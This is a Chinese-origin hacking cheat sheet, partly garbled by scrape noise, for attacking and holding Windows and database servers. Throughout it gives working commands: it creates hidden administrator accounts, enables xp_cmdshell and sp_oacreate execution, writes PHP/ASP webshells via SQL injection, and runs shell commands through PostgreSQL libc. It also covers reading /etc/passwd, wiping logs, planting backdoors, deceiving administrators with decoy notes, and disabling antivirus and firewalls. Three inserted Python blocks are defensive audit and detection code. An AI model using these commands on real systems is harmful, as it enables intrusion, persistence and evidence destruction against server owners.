1. net user administrator /passwordreq:no
This means "the administrator account does not require a password". If it executes successfully, the administrator password can be left blank when logging in over 3389 and you log straight in; once inside, run net user administrator /passwordreq:yes to restore the setting.
2. A neat way to build a cloned account
First create an ordinary user account,
then export its registry key, then delete the account in Computer Management,
then re-import the registry key and add the account to the Administrators group.
3. Finding the Radmin password
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
4. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
Create a subkey named "services.exe",
then create a string value under it
whose data is the full path of the trojan.
5. runas /user:guest cmd
Test user privileges!
6. tlntadmn config sec = -ntlm
exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
This simply uses the tlntadmn command; run it with /? for the details (it needs administrator rights). Creating an identical user to pass NTLM authentication needs no explanation from me, I assume.
7. After the intrusion: patching, trace cleaning, backdoor placement:
The basic vulnerabilities must be patched, such as SU privilege escalation and SA injection. For DBO injection consider removing xp_treelist and xp_regread, and make a note of the web directory yourself. You must remember to clean your traces. For SQL Server connections it is better to use Enterprise Manager; Query Analyzer leaves records under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers, so delete them. Do not clear IIS logs with AIO-type tools that wipe the whole log; use a logcleaner-type tool that deletes only the access records for a specified IP. If you can obtain the administrator password through a GINA, log in as him to clean the logs and do the final trace cleanup with WYWZ. That said, manual cleanup is safer. Finally leave a backdoor that writes no logs. I normally plant several one-line backdoors, a standard backdoor and a cfm backdoor, and remember to adjust the timestamps. One more rather nasty trick: if the machine is just an ordinary zombie, drop a TXT on the administrator's desktop telling him that you broke in, planted a certain backdoor and added a certain user (not your real important backdoor, of course) and ask him to clean it up. That way there is a good chance your real backdoor survives.
8. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c

for example

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators aptime /add'
9. MSSQL Server 2005 has xp_cmdshell switched off by default
To enable it you have to go through the advanced options mode.
It can be injected directly at the injection point:
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then: ;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
or
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
to restore cmdshell.

In Query Analyzer:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then: ;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10. A new way to restore xp_cmdshell
Once the extended stored procedure has been deleted, there is a very simple way to restore it:
Deletion
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

Restoration
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

This restores them directly, whether or not sp_addextendedproc still exists.
-----------------------------

Statement that deletes the extended stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'

SQL statement that restores cmdshell
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

SQL statement that enables cmdshell
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

Check whether the extended stored procedure exists
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it is there

Restore xp_cmdshell
exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it worked

Otherwise upload xplog70.dll
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
SQL statement that blocks cmdshell
sp_dropextendedproc 'xp_cmdshell'
-------------------------
Clear the 3389 login history with a single built-in command:
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f

Then delete the Default.rdp file in the current account's My Documents folder.
View the current user's privileges in MySQL
show grants for

The following statements give privileges identical to the ROOT user. You will have run into this when taking over a site: the MySQL root user can only connect locally and refuses remote connections. The method below solves that. The statements create a user itpro with password 123 and root-equivalent privileges, allowed to connect from any host, so you can conveniently operate the database remotely from your own machine.

CREATE USER 'itpro'@'%' IDENTIFIED BY '123';

GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

Remember to remove your footprints when you are done.

DROP USER 'itpro'@'%';

DROP DATABASE IF EXISTS `itpro` ;
Get SYSTEM privileges from the current user
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
Code:
<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/nosec,user")
oe.add os&"/nosec"
</Script>
<script language=javascript>window.close();</script>
Getting past the CAPTCHA restriction to enter the back end and get a shell
Code:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

Save as code.reg, import it into the registry and restart IE;
that is all it takes.
" T0 ?4 r1 u+ J. a; B2 Q! qunion写马8 \& L2 z- t6 m1 t7 ?! t, W% [
程序代码( L& S$ V8 X& A) Q- R* ]
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
3 [1 I" e4 o2 T9 U* U! {1 X9 m8 i' H9 A; X
Applied to the DedeCMS injection vulnerability: writing the shell without back-end access.
In the DedeCMS back end, when there is no file manager and no outfile privilege,
go to Plugin Management - Virus Scan
and write a one-liner into include/config_hand.php
Code:
>';?><?php @eval($_POST[cmd]);?>

in the format above.
" m# y- M& W$ o k" W5 L& W; loracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解2 f- Q1 [- K, N5 V. j
程序代码
+ z1 R3 W* e9 [2 n' T: m1 Vselect username,password from dba_users;* {6 d8 {; C/ Q% |- k: Q
: M$ N2 `5 S! b0 o
$ E7 L! N- ^. x' |( m8 @4 |
MySQL remote-connection user
Code:
CREATE USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
1. Query the terminal services port

XP & 2003: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

Generic: regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg
2. Enable terminal services on XP & 2003

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3. Change the terminal port to 20008 (0x4E28)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
4. Remove the XP & 2003 firewall restriction on terminal services port 3389 and on connecting IPs
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
5. Enable the terminal on Win2000 on port 3389 (reboot required)
echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg

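The same .reg format that code.reg, tsp.reg and the 2000.reg built above use can be audited instead of imported. The Python below is an added example, not code from the original post: it parses a REGEDIT4 / "Windows Registry Editor Version 5.00" export and flags the settings this page changes (fDenyTSConnections=0, TSEnabled=1, a non-default PortNumber, a third-party GinaDLL, any string value under an Image File Execution Options subkey as in item 4 at the top, and NoLMHash=0). The sample export and the IFEO value name "x" are constructed for the demo.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample export, seeded so that every check below fires once.
# The IFEO value name "x" is a placeholder; the page does not name that value.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00004e28

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"GinaDLL"="awgina.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\services.exe]
"x"="c:\\temp\\x.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"NoLMHash"=dword:00000000
"""

VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')

RegTree = Dict[str, Dict[str, Tuple[str, str]]]


def parse_reg(text: str) -> RegTree:
    """Parse an export into {key (lower-cased): {value name: (kind, data)}}.
    dword data is decoded to a decimal string, quoted strings are unescaped,
    anything else (hex:, @= defaults) is kept raw."""
    keys: RegTree = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("Windows Registry Editor", "REGEDIT4", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m is None or current is None:
            continue
        name, data = m.group("name"), m.group("data")
        if data.startswith("dword:"):
            keys[current][name] = ("dword", str(int(data[6:], 16)))
        elif len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            keys[current][name] = ("string", data[1:-1].replace("\\\\", "\\"))
        else:
            keys[current][name] = ("raw", data)
    return keys


TS_KEY = r"hkey_local_machine\system\currentcontrolset\control\terminal server"
RDP_PORT_KEYS = (TS_KEY + r"\winstations\rdp-tcp", TS_KEY + r"\wds\rdpwd\tds\tcp")
WINLOGON_KEY = r"hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon"
IFEO_KEY = r"hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options"
LSA_KEY = r"hkey_local_machine\system\currentcontrolset\control\lsa"


def audit(keys: RegTree) -> List[str]:
    """Return one tag per risky setting present in the parsed export."""
    findings: List[str] = []

    def get(key: str, name: str) -> Optional[Tuple[str, str]]:
        # value names are compared case-insensitively; exports keep whatever case was written
        for vname, v in keys.get(key, {}).items():
            if vname.lower() == name.lower():
                return v
        return None

    v = get(TS_KEY, "fDenyTSConnections")
    if v is not None and v[1] == "0":
        findings.append("rdp_enabled")                    # items 2 and 5
    v = get(TS_KEY, "TSEnabled")
    if v is not None and v[1] == "1":
        findings.append("ts_enabled_w2k")                 # Win2000, item 5
    for key in RDP_PORT_KEYS:
        v = get(key, "PortNumber")
        if v is not None and v[1] != "3389":
            findings.append("rdp_port_changed:" + v[1])   # item 3 (0x4E28 = 20008)
    v = get(WINLOGON_KEY, "GinaDLL")
    if v is not None:
        findings.append("gina_dll:" + v[1])               # third-party GINA registered
    for key, values in keys.items():
        if key.startswith(IFEO_KEY + "\\"):
            exe = key.rsplit("\\", 1)[1]
            for kind, data in values.values():
                if kind == "string":
                    findings.append("ifeo_string_value:%s:%s" % (exe, data))  # item 4
    v = get(LSA_KEY, "NoLMHash")
    if v is not None and v[1] == "0":
        findings.append("lm_hash_stored")                 # NoLMHash should be 1
    return findings


def audit_text(text: str) -> List[str]:
    return audit(parse_reg(text))


if __name__ == "__main__":
    for tag in audit_text(SAMPLE_REG):
        print(tag)
```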
6. Force a reboot of Win2000 & Win2003 (the system reboots automatically once the last line runs)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf
7. Disable TCP/IP port filtering (reboot required)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
8. When the terminal has exceeded its maximum number of connections, the following command still connects

mstsc /v:ip:3389 /console
9. Adjust NTFS partition permissions
cacls c: /e /t /g everyone:F (gives everyone full control of the C: drive)

cacls %systemroot%\system32\*.exe /d everyone (denies everyone access to the exe files in system32)
------------------------------------------------------
3389.vbs
On Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
Set R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")
Delete the registry value for awgina.dll
Code:
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f

Code:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash

Set it to 1 to disable LM hashes
Database security: common commands for intruding into an Oracle database
Recently I ran into a server that used an Oracle database; after frantically studying Oracle and consulting the experts I finally obtained all the user passwords for the site's back-end management interface. I found Oracle really cumbersome to operate, so to save my brothers some detours later I have put together the commands that are indispensable during an intrusion.
1. su - oracle: not required; useful when you do not have the DBA password, since it lets you enter sqlplus without a password.
2. sqlplus /nolog, or sqlplus system/manager, or ./sqlplus system/manager@ora9i;
3. SQL>connect / as sysdba ; (as sysoper) or
connect internal/oracle AS SYSDBA ; (scott/tiger)
conn sys/change_on_install as sysdba;
4. SQL>startup; starts the database instance
5. View all current databases: select * from v$database;
select name from v$database;
6. desc v$database; shows the database's structure fields
7. How to see which users hold the SYSDBA or SYSOPER privilege:
SQL>select * from V_$PWFILE_USERS;
Show user; shows the user of the current database connection
8. Enter the test database: database test;
9. View all database instances: select * from v$instance;
e.g. ora9i
10. View all tables in the current database:
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_
11. View a table's structure: desc all_tables;
12. Show the structure of all fields of CQI.T_BBS_XUSER:
desc CQI.T_BBS_XUSER;
13. Get the records in the CQI.T_BBS_XUSER table:
select * from CQI.T_BBS_XUSER;
14. Add a database user: (test11/test)
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
15. Grant privileges to the user:
grant connect,resource,dba to test11;
grant sysdba to test11;
commit;
16. Change a database user's password: (change the passwords of sys and system to test)
alter user sys identified by test;
alter user system identified by test;
applicationContext-util.xml
applicationContext.xml
struts-config.xml
web.xml
server.xml
tomcat-users.xml
hibernate.cfg.xml
database_pool_config.xml

\WEB-INF\classes\hibernate.cfg.xml   database connection configuration
\WEB-INF\server.xml   the equivalent of http.conf + mysql.ini + php.ini
\WEB-INF\struts-config.xml   file and directory structure
spring.properties contains the name of the hibernate.cfg.xml file

C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
If none of these can be found, look at the class files.
View the shared folders of a virtual machine:
run in cmd inside the VM
\\.host\Shared Folders
Tricks for finding the terminal service from a cmdshell
Finding the terminal:
Step 1: tasklist /svc lists all processes and system services together with their PIDs.
The service name that corresponds to the terminal is TermService.
Step 2: netstat -ano lists the PID that owns each port;
find the port whose PID matches.
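The same two-step lookup (tasklist /svc, then netstat -ano) is how a defender confirms the port Terminal Services actually listens on, for example after the PortNumber change in item 3 above. The Python below is an added example, not code from the original post; it parses constructed samples of both command outputs (the TermService host here is PID 1040 listening on 20008) and reports any TermService listener that is not on 3389.

```python
import re
from typing import Dict, List, Set

# Constructed sample in the layout of `tasklist /svc` on Windows 2003.
# Long service lists wrap onto continuation lines that start with whitespace.
TASKLIST_SVC = """
Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
svchost.exe                    888 RpcSs
svchost.exe                   1040 TermService
svchost.exe                   1100 Dnscache, NlaSvc,
                                   LanmanWorkstation
"""

# Constructed sample in the layout of `netstat -ano`; UDP rows have no State column.
NETSTAT_ANO = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       888
  TCP    0.0.0.0:20008          0.0.0.0:0              LISTENING       1040
  TCP    192.168.1.5:20008      192.168.1.77:50211     ESTABLISHED     1040
  TCP    [::]:20008             [::]:0                 LISTENING       1040
  UDP    0.0.0.0:53             *:*                                    1100
"""

TASK_RE = re.compile(r"^(?P<image>\S.*?)\s+(?P<pid>\d+)\s+(?P<svcs>.*)$")
NET_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<local>\S+)\s+(?P<foreign>\S+)\s+"
    r"(?:(?P<state>[A-Z_]+)\s+)?(?P<pid>\d+)\s*$"
)


def _split_services(chunk: str) -> List[str]:
    return [s.strip() for s in chunk.strip().strip(",").split(",") if s.strip()]


def parse_tasklist_svc(text: str) -> Dict[int, List[str]]:
    """Map PID -> service names; image names may contain spaces."""
    pids: Dict[int, List[str]] = {}
    last = None
    for line in text.splitlines():
        if not line.strip() or line.startswith(("Image Name", "=")):
            continue
        if line[0].isspace() and last is not None:      # continuation line
            pids[last].extend(_split_services(line))
            continue
        m = TASK_RE.match(line)
        if m is None:
            continue
        last = int(m.group("pid"))
        pids[last] = [s for s in _split_services(m.group("svcs")) if s != "N/A"]
    return pids


def parse_netstat_ano(text: str) -> List[dict]:
    """One dict per socket row: proto, local port, state ('' for UDP) and PID."""
    rows = []
    for line in text.splitlines():
        m = NET_RE.match(line)
        if m is None:
            continue
        rows.append({
            "proto": m.group("proto"),
            "port": int(m.group("local").rsplit(":", 1)[1]),   # works for [::]:port too
            "state": m.group("state") or "",
            "pid": int(m.group("pid")),
        })
    return rows


def service_listeners(tasklist_text: str, netstat_text: str,
                      service: str = "TermService") -> Set[int]:
    """TCP ports on which the process hosting `service` is LISTENING."""
    svc_pids = {pid for pid, names in parse_tasklist_svc(tasklist_text).items()
                if service.lower() in (n.lower() for n in names)}
    return {r["port"] for r in parse_netstat_ano(netstat_text)
            if r["pid"] in svc_pids and r["proto"] == "TCP" and r["state"] == "LISTENING"}


def nonstandard_rdp_ports(tasklist_text: str, netstat_text: str,
                          expected: int = 3389) -> List[int]:
    """Defender check: TermService listening anywhere but the expected port
    suggests the PortNumber registry values were changed."""
    return sorted(p for p in service_listeners(tasklist_text, netstat_text) if p != expected)


if __name__ == "__main__":
    print("TermService listeners:", sorted(service_listeners(TASKLIST_SVC, NETSTAT_ANO)))
    print("non-standard RDP ports:", nonstandard_rdp_ports(TASKLIST_SVC, NETSTAT_ANO))
```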
Query the password hash in SQL Server 2005
SELECT password_hash FROM sys.sql_logins where name='sa'
Full code for adding a user through MySQL on a Chinese-language operating system:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;

English-language version:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;

create table a (cmd BLOB);
insert into a values (CONVERT(<hex code of the trojan>,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mm.exe'
drop table a;
A note on dealing with that obnoxious Norton
Look up the path of the Norton service
sc qc ccSetMgr
Then set permissions to deny access. Be thorough about it.
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone

Then restart the server
iisreset /reboot
That takes care of it. But when you are done, remember to restore the permissions.
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin

EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')

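The statements in items 8 to 10 and the split-string EXEC() form just above are what a SQL Server trace or query log should be screened for, and the concatenation is there precisely to defeat a plain substring match. The Python below is an added example, not code from the original post: it folds 'ma'+'ster' style literals back together and then tags the xp_cmdshell call, the sp_configure enabling steps, dbcc/sp_addextendedproc re-registration and the sp_oacreate/sp_oamethod chain. The sample statements are constructed from the forms on this page.

```python
import re
from typing import Dict, List

# Fold adjacent string literals joined with + ('ma'+'ster') into one literal, so
# EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''') becomes
# EXEC('master..xp_cmdshell ''net user'''). Doubled quotes inside a literal ('')
# carry no '+' and are left alone.
CONCAT_RE = re.compile(r"'\s*\+\s*'")


def normalize(sql: str) -> str:
    folded = CONCAT_RE.sub("", sql)
    return re.sub(r"\s+", " ", folded).strip().lower()


# Rule name and pattern; patterns run against the normalised (lower-cased) text.
RULES = [
    ("xp_cmdshell_call",    re.compile(r"xp_cmdshell\s+'")),
    ("xp_cmdshell_enable",  re.compile(r"sp_configure\s*'xp_cmdshell'\s*,\s*1\b")),
    ("advanced_options_on", re.compile(r"sp_configure\s*'show advanced options'\s*,\s*1\b")),
    ("xp_reregister",       re.compile(r"dbcc\s+addextendedproc|sp_addextendedproc")),
    ("ole_wscript_shell",   re.compile(r"sp_oacreate\s*'wscript\.shell'")),
    ("ole_method_run",      re.compile(r"sp_oamethod\s+@\w+\s*,\s*'run'")),
]


def classify(sql: str) -> List[str]:
    """Names of all rules that match one captured statement."""
    text = normalize(sql)
    return [name for name, pat in RULES if pat.search(text)]


# Constructed sample of captured statements: the page's forms plus one benign query.
SAMPLE_STATEMENTS = [
    "EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')",
    "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;"
    "EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--",
    "dbcc addextendedproc(\"xp_cmdshell\",\"xplog70.dll\")",
    "declare @shell int exec sp_oacreate 'wscript.shell',@shell output "
    "exec sp_oamethod @shell,'run',null,'c:\\windows\\system32\\cmd.exe /c whoami'",
    "SELECT name FROM master.dbo.sysdatabases",
]


def scan(statements: List[str]) -> Dict[str, List[str]]:
    """Only the statements that matched, keyed by statement, with their rule names."""
    hits: Dict[str, List[str]] = {}
    for s in statements:
        tags = classify(s)
        if tags:
            hits[s] = tags
    return hits


if __name__ == "__main__":
    for stmt, tags in scan(SAMPLE_STATEMENTS).items():
        print(", ".join(tags), "<-", stmt)
```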
Some notes on PostgreSQL injection
How to get a webshell
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
How to read a file
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from '/etc/passwd';
http://127.0.0.1/postgresql.php?id=1;select * from myfile;

There are two ways to execute commands: one needs support from a custom libc function, the other uses pl/python.
Of course, the PostgreSQL version must be higher than 8.x for these.
Create a system function:
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

Create an output table:
CREATE TABLE stdout(id serial, system_out text)

Run the shell command, redirecting its output to a file:
SELECT system('uname -a > /tmp/test')

Copy the output into the table:
COPY stdout(system_out) FROM '/tmp/test'

Read the command output back from the output table to see whether execution succeeded

SELECT system_out FROM stdout
Below is a test example

/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --

/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT --

/store.php?id=1; SELECT system('uname -a > /tmp/test') --
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
/store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
net stop sharedaccess   stops the default firewall
netsh firewall show   shows the default firewall configuration
netsh firewall set notifications disable   disables the notification shown when a program is blocked by the default firewall
netsh firewall add allowedprogram c:\1.exe Svchost   adds a program to the default firewall's allowed list
/ O0 w( W3 h0 b7 P4 @' K修改3389端口方法(修改后不易被扫出)
: j2 f) P; C" X5 T" U# ^修改服务器端的端口设置,注册表有2个地方需要修改) J2 Q! e2 {( z# t' b
^. P5 f1 r% F) t) N[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]+ P+ {* q! V) O1 D
PortNumber值,默认是3389,修改成所希望的端口,比如6000
/ C% ?1 i5 K3 K K: i- m( z0 }. ^! S4 e9 y& E. S
第二个地方:
* H7 m( U: _9 J& O[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
& N! x$ ~, z9 o1 _PortNumber值,默认是3389,修改成所希望的端口,比如6000
( b1 T k1 b0 j5 i; S4 @+ H
' j$ t( y6 p( W) [7 x现在这样就可以了。重启系统就可以了
